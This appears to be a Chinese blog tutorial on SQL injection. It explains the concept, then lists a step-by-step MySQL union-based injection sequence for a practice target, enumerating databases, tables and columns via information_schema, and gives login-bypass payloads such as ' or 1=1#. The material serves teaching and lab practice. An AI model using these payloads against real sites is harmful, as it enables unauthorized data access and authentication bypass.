SQL注入的本质

SQL注入的本质

注入攻击的本质: 把用户输入的数据当做代码执行

两个关键条件:

第一个是用户能够控制输入

第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行

针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行

显错注入-联合查询(Mysql数据库)的基本流程

1623234067_60c0961324ec42331fc35.png!small?1623234067968

重要知识点: 通过系统自带库查询数据

通过系统自带库查询数据 Mysql在5.0以上版本加入了information_schema 这个系统自带库

其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

information_schema.tables存放表名和库名的对应

information_schema.columns存放字段名和表名的对应

注: 【information_schema.tables 实际上是选中information_schema库中的tables表】

显错注入靶场的做法

1.判断注入点

最古老的方法: and 1=1 页面正常 and 1=2 页面不正常

最简单的方法: 页面后面加’,看是否报错

好用的方法: 如果是数字型传参,可以尝试-1

例如: http://www.xxx.com/new.php?id=1 页面显示id=1的新闻

http://www.xxx.com/new.php?id=2-1 页面显示id=1的新闻

and 1=1 and 1=2 被拦截的可能性太高了

可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1

或者直接 or sleep(5)

2. 判断当前页面字段总数

and 1=1 order by 1,2,3,4,5……

3.判断显示位

and 1=2 union select 1,2,3,4,5,6,7……

4.查当前数据库

and 1=2 union select 1,2,database()

5.查表名

and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1

6.查列名

and 1=2 union select 1,2,column_name from information_schema.columns where table_name=表名 and table_schema=database() limit 0,1

7.查字段内容

and 1=2 union select 1,字段名,字段名 from 表名 limit 0,1

注:函数GROUP_CONCAT将多行数据进行整合在一行输出

POST注入介绍

POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别

在真实的站点上,POST注入往往比GET注入要多的多

POST注入高危点

登录框

查询框

等各种和数据库有交互的框

最经典的POST注入——万能密码

’or 1=1#

’or 1=1–

  • 7
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值